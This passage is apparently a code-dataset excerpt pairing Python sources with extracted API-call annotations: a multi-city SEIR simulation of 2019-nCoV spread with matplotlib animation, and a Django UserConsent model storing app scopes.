{'deg': '(True)'}), '(I_k_a, deg=True)\n', (16879, 16896), True, 'import numpy as np\n'), ((16942, 16967), 'numpy.angle', 'np.angle', (['I_k_b'], {'deg': '(True)'}), '(I_k_b, deg=True)\n', (16950, 16967), True, 'import numpy as np\n'), ((17013, 17038), 'numpy.angle', 'np.angle', (['I_k_c'], {'deg': '(True)'}), '(I_k_c, deg=True)\n', (17021, 17038), True, 'import numpy as np\n'), ((17084, 17109), 'numpy.angle', 'np.angle', (['I_k_n'], {'deg': '(True)'}), '(I_k_n, deg=True)\n', (17092, 17109), True, 'import numpy as np\n'), ((17151, 17162), 'numpy.abs', 'np.abs', (['i_z'], {}), '(i_z)\n', (17157, 17162), True, 'import numpy as np\n'), ((17204, 17215), 'numpy.abs', 'np.abs', (['i_p'], {}), '(i_p)\n', (17210, 17215), True, 'import numpy as np\n'), ((17257, 17268), 'numpy.abs', 'np.abs', (['i_n'], {}), '(i_n)\n', (17263, 17268), True, 'import numpy as np\n'), ((18484, 18497), 'numpy.abs', 'np.abs', (['I_j_a'], {}), '(I_j_a)\n', (18490, 18497), True, 'import numpy as np\n'), ((18543, 18556), 'numpy.abs', 'np.abs', (['I_j_b'], {}), '(I_j_b)\n', (18549, 18556), True, 'import numpy as np\n'), ((18602, 18615), 'numpy.abs', 'np.abs', (['I_j_c'], {}), '(I_j_c)\n', (18608, 18615), True, 'import numpy as np\n'), ((18661, 18674), 'numpy.abs', 'np.abs', (['I_j_n'], {}), '(I_j_n)\n', (18667, 18674), True, 'import numpy as np\n'), ((18720, 18745), 'numpy.angle', 'np.angle', (['I_j_a'], {'deg': '(True)'}), '(I_j_a, deg=True)\n', (18728, 18745), True, 'import numpy as np\n'), ((18791, 18816), 'numpy.angle', 'np.angle', (['I_j_b'], {'deg': '(True)'}), '(I_j_b, deg=True)\n', (18799, 18816), True, 'import numpy as np\n'), ((18862, 18887), 'numpy.angle', 'np.angle', (['I_j_c'], {'deg': '(True)'}), '(I_j_c, deg=True)\n', (18870, 18887), True, 'import numpy as np\n'), ((18933, 18958), 'numpy.angle', 'np.angle', (['I_j_n'], {'deg': '(True)'}), '(I_j_n, deg=True)\n', (18941, 18958), True, 'import numpy as np\n'), ((19004, 19017), 'numpy.abs', 'np.abs', (['I_k_a'], {}), '(I_k_a)\n', (19010, 19017), True, 'import numpy as np\n'), ((19063, 19076), 'numpy.abs', 'np.abs', (['I_k_b'], {}), '(I_k_b)\n', (19069, 19076), True, 'import numpy as np\n'), ((19122, 19135), 'numpy.abs', 'np.abs', (['I_k_c'], {}), '(I_k_c)\n', (19128, 19135), True, 'import numpy as np\n'), ((19181, 19194), 'numpy.abs', 'np.abs', (['I_k_n'], {}), '(I_k_n)\n', (19187, 19194), True, 'import numpy as np\n'), ((19240, 19265), 'numpy.angle', 'np.angle', (['I_k_a'], {'deg': '(True)'}), '(I_k_a, deg=True)\n', (19248, 19265), True, 'import numpy as np\n'), ((19311, 19336), 'numpy.angle', 'np.angle', (['I_k_b'], {'deg': '(True)'}), '(I_k_b, deg=True)\n', (19319, 19336), True, 'import numpy as np\n'), ((19382, 19407), 'numpy.angle', 'np.angle', (['I_k_c'], {'deg': '(True)'}), '(I_k_c, deg=True)\n', (19390, 19407), True, 'import numpy as np\n'), ((19453, 19478), 'numpy.angle', 'np.angle', (['I_k_n'], {'deg': '(True)'}), '(I_k_n, deg=True)\n', (19461, 19478), True, 'import numpy as np\n'), ((39113, 39126), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (39119, 39126), True, 'import numpy as np\n'), ((39128, 39161), 'numpy.sin', 'np.sin', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (39134, 39161), True, 'import numpy as np\n'), ((39157, 39190), 'numpy.sin', 'np.sin', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (39163, 39190), True, 'import numpy as np\n'), ((39499, 39512), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (39505, 39512), True, 'import numpy as np\n'), ((39514, 39547), 'numpy.sin', 'np.sin', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (39520, 39547), True, 'import numpy as np\n'), ((39543, 39576), 'numpy.sin', 'np.sin', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (39549, 39576), True, 'import numpy as np\n'), ((40658, 40671), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (40664, 40671), True, 'import numpy as np\n'), ((40673, 40706), 'numpy.sin', 'np.sin', (['(theta - 2.0 / 3.0 * np.pi)'], {}), '(theta - 2.0 / 3.0 * np.pi)\n', (40679, 40706), True, 'import numpy as np\n'), ((40702, 40735), 'numpy.sin', 'np.sin', (['(theta + 2.0 / 3.0 * np.pi)'], {}), '(theta + 2.0 / 3.0 * np.pi)\n', (40708, 40735), True, 'import numpy as np\n')] |
from matplotlib import animation
from simulate.citySEIR import dCitySEIR
from simulate.migration import Lout,Lin,dSpread
import pickle
import json
import numpy as np
import matplotlib.pyplot as plt
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['PingFang SC'] # 指定默认字体
mpl.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题
def simulate(initSEIR,days,hparams):
"""
模拟2019-nCoV在46个重要城市之间的传播
:param days:
:param hparams:
:return:
"""
## params
T = days #模拟天数
R0,Di,De,Da = hparams
## init
with open("../data/cases.pickle",'rb') as f:
cases = pickle.load(f)
with open("../data/cityPopulation.json",encoding='utf-8') as f:
population = json.load(f)
numCities = len(population)
citysSEIR = np.zeros((numCities,5,T))
for i,S in enumerate(population):
citysSEIR[i,0,0] = population[S]*10000
citysSEIR[0,:,0] = initSEIR
LSin,DLSin = np.array([Lin(i,0) for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float)
LEin,DLEin = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float)
LI1in,DLI1in = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float)
LI2in,DLI2in = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float)
LRin,DLRin = np.array([0 for i in range(numCities)],dtype=float),np.array([0 for i in range(numCities)],dtype=float)
for t in range(T-1):
for i in range(numCities):
Lo = Lout(i,t) # 第t天流出城市i的人数
Lsi,Lei,Li1i,Li2i,Lri= LSin[i],LEin[i],LI1in[i],LI2in[i],LRin[i]
params = R0,Di,De,Da,Lsi,Lei,Li1i,Li2i,Lri,np.sum(Lo)
initVector = citysSEIR[i,:,t]
dF = dCitySEIR(initVector,t,params=(params))
citysSEIR[i,:,t+1] = citysSEIR[i,:,t] + dF
DLSin += dSpread(Lo,initVector,i)[0]
DLEin += dSpread(Lo,initVector,i)[1]
DLI1in+= dSpread(Lo,initVector,i)[2]
DLI2in+= dSpread(Lo,initVector,i)[3]
DLRin += dSpread(Lo,initVector,i)[4]
LSin,LEin,LI1in,LI2in,LRin = DLSin,DLEin,DLI1in,DLI2in,DLRin
DLSin = np.zeros_like(DLSin)
DLEin = np.zeros_like(DLEin)
DLI1in = np.zeros_like(DLI1in)
DLI2in = np.zeros_like(DLI2in)
DLRin = np.zeros_like(DLRin)
# print(t)
return citysSEIR
def visualize(citysSEIR):
with open("../data/cityAndId.json",encoding='utf-8') as f:
citys = json.load(f)
citys = [i for i in citys]
y_pos = np.arange(len(citys))
numcities,_,T = citysSEIR.shape
fig, ax = plt.subplots(2,2,figsize=(30,20))
for i in range(2):
for j in range(2):
ax[i,j].set_yticks(y_pos)
ax[i,j].set_yticklabels(citys)
x = range(numcities)
# S = ax[0, 0].barh(x, citysSEIR[:,0,T-1])
E = ax[0,0].barh(x,citysSEIR[:,1,T-1])
I1 = ax[0, 1].barh(x,citysSEIR[:,2,T-1])
I2 = ax[1, 0].barh(x,citysSEIR[:,3,T-1])
R = ax[1, 1].barh(x,citysSEIR[:,4,T-1])
# N = ax[1, 2].barh(x,np.sum(citysSEIR[:,:,T-1],axis=1))
SEIR = [E,I1,I2,R]
def animate(i):
# tex1 = ax[0, 0].set_title("S day{}".format(str(i + 1)))
tex2 = ax[0, 0].set_title("E day{}".format(str(i + 1)))
tex3 = ax[0, 1].set_title("I1 day{}".format(str(i + 1)))
tex4 = ax[1, 0].set_title("I2 day{}".format(str(i + 1)))
tex5 = ax[1, 1].set_title("R day{}".format(str(i + 1)))
# tex6 = ax[1, 2].set_title("N day{}".format(str(i + 1)))
for j,bar in enumerate(SEIR):
if j ==5:
y = np.sum(citysSEIR[:,:,i],axis=1)
else:
y = citysSEIR[:,j+1,i]
for t, b in enumerate(bar):
b.set_width(y[t])
anim = animation.FuncAnimation(fig, animate, repeat=True, blit=False, frames=T-1,
interval=200)
anim.save('mymovie.gif', writer='pillow')
plt.show()
if __name__ == "__main__":
R0 = 2.2
Di = 5
De = 12
Da = 3
T = 30
initSEIR = [1108.1*10000,10,100,1,0] # 武汉的S,E,I1,I2,R
citysSEIR = simulate(initSEIR,days=T,hparams=(R0,Di,De,Da))
visualize(citysSEIR)
| [
"matplotlib.animation.FuncAnimation",
"pickle.load",
"simulate.migration.Lout",
"numpy.sum",
"numpy.zeros",
"simulate.migration.Lin",
"simulate.citySEIR.dCitySEIR",
"json.load",
"simulate.migration.dSpread",
"numpy.zeros_like",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
] | [((810, 837), 'numpy.zeros', 'np.zeros', (['(numCities, 5, T)'], {}), '((numCities, 5, T))\n', (818, 837), True, 'import numpy as np\n'), ((2787, 2823), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '(30, 20)'}), '(2, 2, figsize=(30, 20))\n', (2799, 2823), True, 'import matplotlib.pyplot as plt\n'), ((3979, 4073), 'matplotlib.animation.FuncAnimation', 'animation.FuncAnimation', (['fig', 'animate'], {'repeat': '(True)', 'blit': '(False)', 'frames': '(T - 1)', 'interval': '(200)'}), '(fig, animate, repeat=True, blit=False, frames=T - 1,\n interval=200)\n', (4002, 4073), False, 'from matplotlib import animation\n'), ((4156, 4166), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4164, 4166), True, 'import matplotlib.pyplot as plt\n'), ((639, 653), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (650, 653), False, 'import pickle\n'), ((745, 757), 'json.load', 'json.load', (['f'], {}), '(f)\n', (754, 757), False, 'import json\n'), ((2326, 2346), 'numpy.zeros_like', 'np.zeros_like', (['DLSin'], {}), '(DLSin)\n', (2339, 2346), True, 'import numpy as np\n'), ((2364, 2384), 'numpy.zeros_like', 'np.zeros_like', (['DLEin'], {}), '(DLEin)\n', (2377, 2384), True, 'import numpy as np\n'), ((2403, 2424), 'numpy.zeros_like', 'np.zeros_like', (['DLI1in'], {}), '(DLI1in)\n', (2416, 2424), True, 'import numpy as np\n'), ((2443, 2464), 'numpy.zeros_like', 'np.zeros_like', (['DLI2in'], {}), '(DLI2in)\n', (2456, 2464), True, 'import numpy as np\n'), ((2482, 2502), 'numpy.zeros_like', 'np.zeros_like', (['DLRin'], {}), '(DLRin)\n', (2495, 2502), True, 'import numpy as np\n'), ((2655, 2667), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2664, 2667), False, 'import json\n'), ((1663, 1673), 'simulate.migration.Lout', 'Lout', (['i', 't'], {}), '(i, t)\n', (1667, 1673), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((1893, 1932), 'simulate.citySEIR.dCitySEIR', 'dCitySEIR', (['initVector', 't'], {'params': 'params'}), '(initVector, t, params=params)\n', (1902, 1932), False, 'from simulate.citySEIR import dCitySEIR\n'), ((986, 995), 'simulate.migration.Lin', 'Lin', (['i', '(0)'], {}), '(i, 0)\n', (989, 995), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((1821, 1831), 'numpy.sum', 'np.sum', (['Lo'], {}), '(Lo)\n', (1827, 1831), True, 'import numpy as np\n'), ((2011, 2037), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2018, 2037), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2061, 2087), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2068, 2087), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2111, 2137), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2118, 2137), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2161, 2187), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2168, 2187), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((2211, 2237), 'simulate.migration.dSpread', 'dSpread', (['Lo', 'initVector', 'i'], {}), '(Lo, initVector, i)\n', (2218, 2237), False, 'from simulate.migration import Lout, Lin, dSpread\n'), ((3798, 3832), 'numpy.sum', 'np.sum', (['citysSEIR[:, :, i]'], {'axis': '(1)'}), '(citysSEIR[:, :, i], axis=1)\n', (3804, 3832), True, 'import numpy as np\n')] |
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from .app import App
class UserConsent(models.Model):
class Meta:
verbose_name = _("user consent")
verbose_name_plural = _("user consents")
unique_together = ('user', 'app')
user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("user"))
app = models.ForeignKey(App, verbose_name=_("app"))
_scope = models.TextField(default='', verbose_name=_("scopes"))
date_given = models.DateTimeField(verbose_name=_("date given"), auto_now_add=True)
date_updated = models.DateTimeField(verbose_name=_("date updated"), auto_now=True)
@property
def scope(self):
return set(self._scope.split())
@scope.setter
def scope(self, value):
self._scope = ' '.join(value)
def __str__(self):
return '{0} - {1}'.format(self.app, self.user)
| [
"django.utils.translation.ugettext_lazy"
] | [((205, 222), 'django.utils.translation.ugettext_lazy', '_', (['"""user consent"""'], {}), "('user consent')\n", (206, 222), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((247, 265), 'django.utils.translation.ugettext_lazy', '_', (['"""user consents"""'], {}), "('user consents')\n", (248, 265), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((368, 377), 'django.utils.translation.ugettext_lazy', '_', (['"""user"""'], {}), "('user')\n", (369, 377), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((422, 430), 'django.utils.translation.ugettext_lazy', '_', (['"""app"""'], {}), "('app')\n", (423, 430), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((484, 495), 'django.utils.translation.ugettext_lazy', '_', (['"""scopes"""'], {}), "('scopes')\n", (485, 495), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((546, 561), 'django.utils.translation.ugettext_lazy', '_', (['"""date given"""'], {}), "('date given')\n", (547, 561), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((632, 649), 'django.utils.translation.ugettext_lazy', '_', (['"""date updated"""'], {}), "('date updated')\n", (633, 649), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.